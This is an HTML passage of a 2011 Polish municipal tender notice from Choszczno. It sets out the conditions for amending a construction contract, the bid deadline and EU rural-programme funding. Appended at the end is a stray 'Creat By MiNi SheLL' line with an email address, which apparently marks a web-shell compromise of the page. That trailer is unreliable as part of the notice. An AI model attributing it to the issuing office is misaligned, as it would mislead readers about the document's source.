4.	Zamawiający przewiduje możliwość wprowadzenia zmian do zawartej umowy w formie pisemnego aneksu na następujących warunkach :
 
4.1.	Wykonawca może dokonywać zmiany kluczowych specjalistów, przedstawionych w ofercie ,jedynie za uprzednią pisemną zgodą Zamawiającego, akceptującego nowego kluczowego specjalistę.
4.2.	Wykonawca z własnej inicjatywy proponuje zmianę kluczowych specjalistów  w następujących przypadkach:
a). śmierci, choroby lub zdarzeń losowych kluczowego specjalisty,
b). nie wywiązywania się kluczowego specjalisty z obowiązków wynikających   z umowy.
4.3.	Jeżeli zmiana kluczowego specjalisty stanie się konieczna z jakichkolwiek innych przyczyn niezależnych od wykonawcy (np. rezygnacji itp.),
4.4.	Zamawiający może zażądać od wykonawcy zmiany kluczowego specjalisty, jeżeli uzna, że kluczowy  specjalista nie wykonuje swoich obowiązków wynikających z umowy. Wykonawca obowiązany jest zmienić  kluczowego specjalistę zgodnie z żądaniem Zamawiającego w terminie wskazanym we wniosku Zamawiającego. W przypadku zmiany kluczowego specjalisty  nowy kluczowy specjalista musi spełniać wymagania określone dla danego specjalisty.
4.5.	Wykonawca może przedłużyć termin wykonania przedmiotu umowy o czas opóźnienia  Zamawiającego, jeżeli takie opóźnienie jest lub będzie miało wpływ na wykonanie przedmiotu umowy w wykonaniu następujących zobowiązań:
a.	przekazania terenu budowy,
b.	przekazania dokumentacji budowy (pozwolenia na budowę, dokumentacji projektowej, specyfikacji technicznych,  innych wymaganych przepisami, do których zamawiający był zobowiązany),
c.	przekazania dokumentów zamiennych budowy lub usunięcia wad w dostarczanej dokumentacji projektowej,
d.	zmiany terminu dokonania prób końcowych i wniosków o dokonanie prób dodatkowych nieobjętych umową,
e.	zmiany terminu dokonania odbiorów przewidzianych w umowie.
4.6.	Wykonawca może przedłużyć termin wykonania przedmiotu umowy o czas opóźnienia, jeżeli takie opóźnienie jest lub będzie miało wpływ na wykonanie przedmiotu umowy w przypadku:
a.	zawieszenia robót przez Zamawiającego,
b.	wykopalisk uniemożliwiających wykonanie robót,
c.	szczególnie niesprzyjających warunków  atmosferycznych uniemożliwiających prowadzenie robót budowlanych,  przeprowadzanie prób i sprawdzeń, dokonywanie odbiorów,
d.	siły wyższej, klęski żywiołowej
e.	jakiegokolwiek opóźnienia, utrudnienia lub przeszkody  spowodowane przez lub dających 
się przypisać Zamawiającemu lub innemu  wykonawcy zatrudnionemu  przez Zamawiającego na terenie budowy,
f.	niewypałów i niewybuchów,
g.	wykopalisk archeologicznych nieprzewidywanych w siwz,
h.	odmiennych od przyjętych w dokumentacji projektowej warunków  geologicznych (kategorie gruntu, kurzawka  itp.),
i.	odmiennych od przyjętych w dokumentacji projektowej warunków terenowych, w szczególności  istnienie  podziemnych urządzeń, instalacji lub obiektów  infrastrukturalnych,
j.	zmiany się w trakcie wykonywania umowy przepisów, norm lub normatywów mających zastosowanie do przedmiotu  umowy, lub tych zmian dokona Zamawiający,
k.	jeżeli jednostki administracji nie zachowają wymaganych zgodnie z obowiązującymi przepisami terminów odpowiedzi na wnioski, 
4.7.	Jeżeli wystąpią zmiany będące następstwem okoliczności leżących po stronie Zamawiającego, 
w szczególności :
a.	wstrzymanie robót przez  Zamawiającego,
b.	konieczności  usunięcia błędów lub wprowadzenia zmian w dokumentacji  projektowej.
4.8.	Jeżeli powstaną okoliczności będące następstwem działania  organów administracji, w szczególności:
a.	przekroczenie zakreślonych przez prawo terminów wydawania przez organy administracji decyzji,  zezwoleń  itp.,
b.	odmowa wydania przez organy administracji wymaganych  decyzji, zezwoleń,  uzgodnień na skutek błędów w dokumentacji projektowej.
4.9.	Jeżeli powstały konieczne zmiany  technologiczne, w szczególności :
a.	konieczności zrealizowania  projektu  przy  zastosowaniu innych  rozwiązań  technicznych/technologicznych  niż wskazane w dokumentacji  projektowej w sytuacji, gdyby zastosowanie przewidzianych  rozwiązań  groziłoby niewykonaniem  lub wadliwym  wykonaniem  projektu,
b.	odmienne od przyjętych w dokumentacji  projektowej  warunki  geologiczne   (kategorie gruntu, kurzawa itp.) skutkujące  niemożliwością  zrealizowania przedmiotu umowy  przy dotychczasowych założeniach  technologicznych,
c.	odmienne od przyjętych w dokumentacji projektowej warunki terenowe, w szczególności istnienie podziemnych  urządzeń instalacji  lub  obiektów infrastrukturalnych,     
d.	konieczności zrealizowania projektu przy  zastosowaniu innych rozwiązań technicznych lub materiałowych ze względu na zmiany obowiązującego  prawa.
Zmiany wskazywane w lit d będą wprowadzone wyłącznie w zakresie  umożliwiającym  oddanie przedmiotu  umowy do użytkowania, a  Zamawiający  może ponieść ryzyko zwiększanym z tego powodu  kosztom. Każde ze wskazanych  w lit. a -d  zmian  może  być powiązane ze zmianą  wynagrodzenia na zasadach określonych  przez strony.
4.10.	Pozostałe zmiany 
a)	jeśli zmiana stawki podatku VAT będzie  powodować  zwiększenie  kosztów  wykonania  po stronie  wykonawcy, Zamawiający  dopuszcza  możliwość zwiększenia  wynagrodzenia  o kwotę równą różnicy  w kwocie  podatku  VAT  zapłaconego  przez  wykonawcę, 
b)	jeśli  zmiana  stawki VAT  będzie powodować zmniejszenie  kosztów wykonania  umowy  po  stronie wykonawcy, Zamawiający  przewiduje  możliwość  zmniejszenia  wynagrodzenia o kwotę stanowiącą różnicę  kwoty podatku  VAT  do zapłacenia  przez  wykonawcę ,
c)	 rezygnacja  przez  zamawiającego z realizacji części   przedmiotu  umowy - w takim przypadku  wynagrodzenie  przysługujące  wykonawcy  zostanie  pomniejszone, przy  czym  Zamawiający  zapłaci za  wszystkie  spełnione  świadczenia  oraz udokumentowane  koszty,  które  wykonawca  poniósł w związku z wynikającymi z umowy  planowanymi  świadczeniami,
d)	kolizja z planowanymi  lub równolegle prowadzonymi przez inne  podmioty inwestycjami - w takim  przypadku  zmiany  w umowie  zostaną ograniczone  do zmian  koniecznych powodujących  uniknięcie  kolizji, a  wynagrodzenie  zostanie  ustalone z zachowaniem  zasady opisanej 
w specyfikacji i ofercie wykonawcy,
4.11.	Zmiana umowy nastąpić może z inicjatywy Zamawiającego albo Wykonawcy poprzez przedstawienie drugiej stronie propozycji zmian w formie pisemnej, które powinny zawierać: 
a.	opis zmiany,
b.	uzasadnienie zmiany,
c.	koszt zmiany oraz jego wpływ na wysokość wynagrodzenia,
d.	czas wykonania zmiany oraz wpływ zmiany na termin zakończenia umowy.
4.12.	Warunkiem wprowadzenia zmian do zawartej umowy będzie potwierdzenie powstałych okoliczności w formie opisowej i właściwie umotywowanej (protokół wraz z uzasadnieniem) przez powołaną przez Zamawiającego komisję techniczną, w składzie której będą m.in. Inżynier Kontraktu oraz Kierownik budowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.choszczno.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Choszcznie, ul. Wolności 24, 73-200 Choszczno.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.04.2011 godzina 08:00, miejsce: Kancelaria ogólna Urzędu Miejskiego w Choszcznie, ul. Wolności 24, 73-200 Choszczno.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie będzie dofinansowane ze środków Programu Rozwoju Obszarów Wiejskich na lata 2007 - 2013 w ramach działania Podstawowe usługi dla gospodarki i ludności wiejskiej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com